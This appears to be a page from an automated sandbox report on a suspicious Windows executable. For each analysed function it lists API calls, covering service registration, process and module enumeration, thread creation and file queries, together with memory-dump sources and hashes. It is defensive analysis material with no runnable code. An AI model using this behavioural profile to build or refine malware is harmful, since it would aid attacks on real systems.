                                                                                                                                                                                                            • Associated: 00000000.00000002.1333011841.0000000000F4B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_ec0000_mtuXDnH1Di.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID: 63{
                                                                                                                                                                                                            • API String ID: 0-1405228871
                                                                                                                                                                                                            • Opcode ID: ccff89fe0668485377f09e62f780ef7284dbaf04f34c2b58ff2a62ff65586143
                                                                                                                                                                                                            • Instruction ID: 0ddfd51f24d71cab4f89e11cee311c952934f961a4c17523633e9e569437e775
                                                                                                                                                                                                            • Opcode Fuzzy Hash: ccff89fe0668485377f09e62f780ef7284dbaf04f34c2b58ff2a62ff65586143
                                                                                                                                                                                                            • Instruction Fuzzy Hash: C6C1EDB6605A0DCFC708DF28FC912213BF2FBA5320355411AD982D67B9E73958A5FB80
                                                                                                                                                                                                            Function 00ECC660 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • StartServiceCtrlDispatcherA.ADVAPI32(?), ref: 00ECC692
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.1332887026.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332871344.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332916326.0000000000EF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332933550.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332933550.0000000000EFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332933550.0000000000F39000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332933550.0000000000F4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.1333011841.0000000000F4B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_ec0000_mtuXDnH1Di.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: CtrlDispatcherServiceStart
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 3789849863-0
                                                                                                                                                                                                            • Opcode ID: 08caf793cbde872aa278f8ecc0774257d8f68101934eefde2f59065bc6ad6605
                                                                                                                                                                                                            • Instruction ID: 04d304e1a51c4c839c27e2fcec3f00a6d61792f6ff16067e6d1210d13ec31178
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 08caf793cbde872aa278f8ecc0774257d8f68101934eefde2f59065bc6ad6605
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 61E01A75D0220C9BC704EFB4ED454AEBBF4FB88300B408A9AE414EB360EB745501DF85
                                                                                                                                                                                                            Function 00ED97B0 Relevance: .9, Instructions: 866COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.1332887026.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332871344.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332916326.0000000000EF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332933550.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332933550.0000000000EFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332933550.0000000000F39000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332933550.0000000000F4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.1333011841.0000000000F4B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_ec0000_mtuXDnH1Di.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                            • Opcode ID: 95ddc75a53c87f5e78ba94c9d78e3876b0504af5e00414338225496c316e1cbc
                                                                                                                                                                                                            • Instruction ID: 7f95925ac3052cafa6d4ed56c21fef8ed02c44fb95fcc5c27e4238137472e9c6
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 95ddc75a53c87f5e78ba94c9d78e3876b0504af5e00414338225496c316e1cbc
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 13824675A0420DCFC704EF25FD852A93BF2FBA5350B15801AD881A63BAE7344966FF85
                                                                                                                                                                                                            Function 00EC1490 Relevance: .4, Instructions: 409COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.1332887026.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332871344.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332916326.0000000000EF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332933550.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332933550.0000000000EFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332933550.0000000000F39000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332933550.0000000000F4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.1333011841.0000000000F4B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_ec0000_mtuXDnH1Di.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                            • Opcode ID: 3a8d2c28a291f400bb74ac61dad203ef75c9433b16fe653a0d5d9bb81f810065
                                                                                                                                                                                                            • Instruction ID: c715c1878940e29e8e0184d91614c1e77f6f2b4b5aa2dcca4f4fdd213c355a3e
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3a8d2c28a291f400bb74ac61dad203ef75c9433b16fe653a0d5d9bb81f810065
                                                                                                                                                                                                            • Instruction Fuzzy Hash: D10238B6A0130DCFD708DF25FE951643BB1F7A6321312815AD882A72B9E73548A5FF80
                                                                                                                                                                                                            Function 00EE4EA0 Relevance: .4, Instructions: 386COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.1332887026.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332871344.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332916326.0000000000EF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332933550.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332933550.0000000000EFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332933550.0000000000F39000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332933550.0000000000F4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.1333011841.0000000000F4B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_ec0000_mtuXDnH1Di.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                            • Opcode ID: 629b60e97bebf0cff9e30b87cc9b5c65a690e1ca0bd33697d786fdbe934d6185
                                                                                                                                                                                                            • Instruction ID: 8e661af675f3da278b2dbcb33b8f73888c191b0f9982c5c23d96981ed8641483
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 629b60e97bebf0cff9e30b87cc9b5c65a690e1ca0bd33697d786fdbe934d6185
                                                                                                                                                                                                            • Instruction Fuzzy Hash: DDF11576B0260CCFC704DF26FC851693BB2F7D9314726811AD842A32B8EB759461EF84
                                                                                                                                                                                                            Function 00EF0220 Relevance: .4, Instructions: 361COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.1332887026.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332871344.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332916326.0000000000EF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332933550.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332933550.0000000000EFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332933550.0000000000F39000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332933550.0000000000F4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.1333011841.0000000000F4B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_ec0000_mtuXDnH1Di.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                            • Opcode ID: cc475e609cf5c85cdbb082806a3b7177ccae0bcf6538c06b0bbbfdb521446348
                                                                                                                                                                                                            • Instruction ID: 4afba5501d9f247e30c0c87fc54765f6a0b21f0c09aebd36e66bb32a58444b4a
                                                                                                                                                                                                            • Opcode Fuzzy Hash: cc475e609cf5c85cdbb082806a3b7177ccae0bcf6538c06b0bbbfdb521446348
                                                                                                                                                                                                            • Instruction Fuzzy Hash: D8E16376A0020DCFD714DF24FC412B53BE1F7A5325B14812AEA86E22B6E7349991EF91
                                                                                                                                                                                                            Function 00ECF330 Relevance: .3, Instructions: 320COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.1332887026.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332871344.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332916326.0000000000EF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332933550.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332933550.0000000000EFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332933550.0000000000F39000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332933550.0000000000F4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.1333011841.0000000000F4B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_ec0000_mtuXDnH1Di.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: lstrlen
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 1659193697-0
                                                                                                                                                                                                            • Opcode ID: 31744e45162e65109ca99474c45f06abec933146bff16fee278986cb91695423
                                                                                                                                                                                                            • Instruction ID: 6f4c2c3228bdc1a4255addadc520716c7071884b00313ada5047d47508d2e9e9
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 31744e45162e65109ca99474c45f06abec933146bff16fee278986cb91695423
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 36D1D176A0420DCFC704DF29FD856653BB2FB98321311852AD885D73B4E73598A2EF81
                                                                                                                                                                                                            Function 00EDA0A6 Relevance: .3, Instructions: 310COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.1332887026.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332871344.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332916326.0000000000EF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332933550.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332933550.0000000000EFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332933550.0000000000F39000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332933550.0000000000F4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.1333011841.0000000000F4B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_ec0000_mtuXDnH1Di.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                            • Opcode ID: 0320c7209bd7049ce0075f62f93618beae7ca07f53c06241e11bd396ae0b9cd8
                                                                                                                                                                                                            • Instruction ID: 8af3d69740b3153ed9ce6e36dc9f57968a885a88af124a264b631312686a4193
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0320c7209bd7049ce0075f62f93618beae7ca07f53c06241e11bd396ae0b9cd8
                                                                                                                                                                                                            • Instruction Fuzzy Hash: DCD144B5A0430DCFC705EF25FD812A93BB2F790310F198066D981A73B5E3349556EB81
                                                                                                                                                                                                            Function 00ED6C10 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 187registrysynchronizationCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • RegisterServiceCtrlHandlerA.ADVAPI32(015BFCE0,Function_00011860), ref: 00ED6D72
                                                                                                                                                                                                            • SetServiceStatus.ADVAPI32(00000000,00F305F8), ref: 00ED6DD5
                                                                                                                                                                                                            • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00ED6DE9
                                                                                                                                                                                                            • SetServiceStatus.ADVAPI32(00000000,00F305F8), ref: 00ED6E8A
                                                                                                                                                                                                            • WaitForSingleObject.KERNEL32(00000000,00001388), ref: 00ED6EBE
                                                                                                                                                                                                            • SetServiceStatus.ADVAPI32(00000000,00F305F8), ref: 00ED6F2B
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00ED6F42
                                                                                                                                                                                                            • SetServiceStatus.ADVAPI32(00000000,00F305F8), ref: 00ED6FAA
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.1332887026.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332871344.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332916326.0000000000EF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332933550.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332933550.0000000000EFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332933550.0000000000F39000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332933550.0000000000F4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.1333011841.0000000000F4B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_ec0000_mtuXDnH1Di.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Service$Status$CloseCreateCtrlEventHandleHandlerObjectRegisterSingleWait
                                                                                                                                                                                                            • String ID: =ZMI
                                                                                                                                                                                                            • API String ID: 3399922960-150576250
                                                                                                                                                                                                            • Opcode ID: 993f75257717011b179b84dd92680b5cafa7e6ca035eeb4a23fbb2b9721836f8
                                                                                                                                                                                                            • Instruction ID: 8efab2cca66e2f53ce2f16e55872ed816bf4437c43ccc3371fb75d0dddfcf5a0
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 993f75257717011b179b84dd92680b5cafa7e6ca035eeb4a23fbb2b9721836f8
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 01911FB5A4130DCFD304DF25FD9A5223BB6F798720705810AE895E22B8DBB84465FF86
                                                                                                                                                                                                            Function 00ED4380 Relevance: 10.9, APIs: 7, Instructions: 387processCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00ED44A7
                                                                                                                                                                                                            • Process32First.KERNEL32(00000000,?), ref: 00ED45C2
                                                                                                                                                                                                            • CreateToolhelp32Snapshot.KERNEL32(00000008,?), ref: 00ED47CE
                                                                                                                                                                                                            • Module32First.KERNEL32(00000000,00000224), ref: 00ED4842
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,0000000A), ref: 00ED495A
                                                                                                                                                                                                            • Process32Next.KERNEL32(?,00000128), ref: 00ED49AD
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00ED4A20
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.1332887026.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332871344.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332916326.0000000000EF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332933550.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332933550.0000000000EFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332933550.0000000000F39000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332933550.0000000000F4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.1333011841.0000000000F4B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_ec0000_mtuXDnH1Di.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: CloseCreateFirstHandleProcess32SnapshotToolhelp32$Module32Next
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 930127669-0
                                                                                                                                                                                                            • Opcode ID: bea7ae8730019887069b1301f6f9c863f1bf42d7ff33c684c2ac75d97f0e92db
                                                                                                                                                                                                            • Instruction ID: f7cf5590ccbed5189ac05a4cfb90f0e0d14509178262b6509897318a47586d15
                                                                                                                                                                                                            • Opcode Fuzzy Hash: bea7ae8730019887069b1301f6f9c863f1bf42d7ff33c684c2ac75d97f0e92db
                                                                                                                                                                                                            • Instruction Fuzzy Hash: E9F165B1A0020DCFD704DF25FD866A93BB6F7D5321B11405AD886E62B4EB7488A6FF41
                                                                                                                                                                                                            Function 00ECBBC0 Relevance: 10.7, APIs: 7, Instructions: 205processCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00ECBC90
                                                                                                                                                                                                            • Process32First.KERNEL32(00000000,?), ref: 00ECBCE3
                                                                                                                                                                                                            • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00ECBDDD
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.1332887026.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332871344.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332916326.0000000000EF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332933550.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332933550.0000000000EFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332933550.0000000000F39000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332933550.0000000000F4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.1333011841.0000000000F4B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_ec0000_mtuXDnH1Di.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: CreateFirstOpenProcessProcess32SnapshotToolhelp32
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 3397401024-0
                                                                                                                                                                                                            • Opcode ID: 06dbd40af95fee4b9df84260c849655c6504dd0f537da668f3296eebba71b4c1
                                                                                                                                                                                                            • Instruction ID: 7f3089d3b4962ffc562e55b735e338fc14a634655d833947e6f6ac636ec4389e
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 06dbd40af95fee4b9df84260c849655c6504dd0f537da668f3296eebba71b4c1
                                                                                                                                                                                                            • Instruction Fuzzy Hash: EB91157960020DCFD714DF25FD96A793BFAFBA8714B15801AD801A3270DB349999EF40
                                                                                                                                                                                                            Function 00EF5440 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 71synchronizationthreadCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,?,00EDE92E,00EDCA40,00000000,?), ref: 00EF54B2
                                                                                                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,00000000,?,00000000,00000000), ref: 00EF54E4
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,?,00EDE92E,00EDCA40,00000000,?), ref: 00EF551D
                                                                                                                                                                                                            • WaitForSingleObject.KERNEL32(?,000000FF,?,00EDE92E,00EDCA40,00000000,?), ref: 00EF5538
                                                                                                                                                                                                            • CloseHandle.KERNEL32(?,?,000000FF,?,00EDE92E,00EDCA40,00000000,?), ref: 00EF554B
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.1332887026.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332871344.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332916326.0000000000EF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332933550.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332933550.0000000000EFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332933550.0000000000F39000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332933550.0000000000F4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.1333011841.0000000000F4B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_ec0000_mtuXDnH1Di.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: CloseCreateHandle$EventObjectSingleThreadWait
                                                                                                                                                                                                            • String ID: .
                                                                                                                                                                                                            • API String ID: 1404307249-3963672497
                                                                                                                                                                                                            • Opcode ID: 2bb32d345ec09731ca962ee7b64a4c7e551600ce3b7a70e8542ecc3b704d9c05
                                                                                                                                                                                                            • Instruction ID: f611a96465e869d365ae21a37a4c81e6b75439468aae59ad6b822e2d890d2147
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2bb32d345ec09731ca962ee7b64a4c7e551600ce3b7a70e8542ecc3b704d9c05
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2831CE3460030DEFD308DF65EC59B627BE5FB88B21F10801AE6869B2B0E7709490EF91
                                                                                                                                                                                                            Function 00ED1530 Relevance: 9.2, APIs: 6, Instructions: 176filetimeCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • CreateFileA.KERNEL32(?,00000000,00000000,00000000,00000003,00000000,00000000), ref: 00ED15C3
                                                                                                                                                                                                            • GetFileTime.KERNEL32(00000000,?,?,?), ref: 00ED168A
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00ED16A7
                                                                                                                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00ED1715
                                                                                                                                                                                                            • GetFileSize.KERNEL32(00000000,00000000,2AC18000,FE624E21,00989680,00000000), ref: 00ED1774
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00ED1792
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.1332887026.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332871344.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332916326.0000000000EF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332933550.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332933550.0000000000EFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332933550.0000000000F39000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332933550.0000000000F4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.1333011841.0000000000F4B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_ec0000_mtuXDnH1Di.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: File$CloseHandle$CreateSizeTimeUnothrow_t@std@@@__ehfuncinfo$??2@
